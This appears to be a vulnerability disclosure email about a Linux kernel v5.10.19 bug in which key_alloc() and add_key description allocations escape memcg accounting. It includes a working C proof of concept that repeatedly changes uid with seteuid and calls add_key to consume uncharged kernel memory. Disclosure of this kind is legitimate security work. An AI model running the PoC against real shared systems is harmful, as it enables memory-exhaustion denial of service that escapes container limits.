Hi, our team has found a bug in key_alloc() in Linux kernel v5.10.19 that allows memcg limits to be bypassed.
The bug is caused by the code snippets listed below:
/*--------------- key.c --------------------*/
...
276 /* allocate and initialise the key and its description */
277 key = kmem_cache_zalloc(key_jar, GFP_KERNEL);
278 if (!key)
279 goto no_memory_2;
...
/*---------------- end ---------------------*/
/*------------- keyctl.c -------------------*/
...
95 if (_description) {
96 description = strndup_user(_description, KEY_MAX_DESC_SIZE);
97 if (IS_ERR(description)) {
...
/*--------------- end ---------------------*/
Each user can allocate ~20KB of uncharged memory by calling the add_key syscall to trigger the code listed above.
The code at line 277 in the first snippet allocates a new struct key object that is not charged to memcg, because no accounting flag is passed
either at this allocation site or at the site where key_jar is created. At line 96 in the second snippet, the memory used by a key's description,
which has a maximum size of 4096 bytes, is also not charged. A user can allocate multiple keys and consume more uncharged memory.
The upper limit on key memory is set to 20,000 bytes per user by default.
The bug can cause a severe memcg limit bypass if a process can change its uid and thereby sidestep the per-user limit above. For example, a user may hold root privileges
in its own user namespace and use the seteuid() syscall to change its uid repeatedly.
Our evaluation on QEMU v5.1.0 with cgroup v2 shows that, under this assumption, we could consume ~2.2GB of memory by allocating keys from 100,000 different uids, while the memory charged by memcg is only ~215MB.
The PoC code is listed below:
/*--------------- PoC --------------------*/
#include <asm/unistd.h>
#include <linux/keyctl.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <time.h>

#define DESC_LEN 3900

char desc[4000];

/* Switch to the given uid and add keys until add_key fails (e.g. quota hit). */
void alloc_key_user(int id) {
    int i, times = 0;
    long serial;

    if (seteuid(id) == 0)
        printf("uid allocation success on id %d!\n", id);
    else {
        printf("uid allocation failed on id %d!\n", id);
        return;
    }
    for (;;) {
        /* Random non-NUL description so that every key is distinct. */
        for (i = 0; i < DESC_LEN; ++i)
            desc[i] = rand() % 255 + 1;
        desc[i] = '\0';
        serial = syscall(__NR_add_key, "user", desc, "payload",
                         strlen("payload"), KEY_SPEC_SESSION_KEYRING);
        if (serial == -1)
            break;
        ++times;
    }
    printf("allocation happened %d times.\n", times);
    seteuid(0);  /* regain root so the next seteuid() can succeed */
}

int main(void) {
    int loop_times = 0;
    int start_uid = 0;

    /* Input: first uid to use and the number of consecutive uids. */
    if (scanf("%d %d", &start_uid, &loop_times) != 2)
        return 1;
    srand(time(0));  /* seed once, not once per uid */
    for (int i = 0; i < loop_times; ++i)
        alloc_key_user(i + start_uid);
    return 0;
}
/*-------------PoC end ---------------------*/
Thanks!
Best regards,
Yutian Yang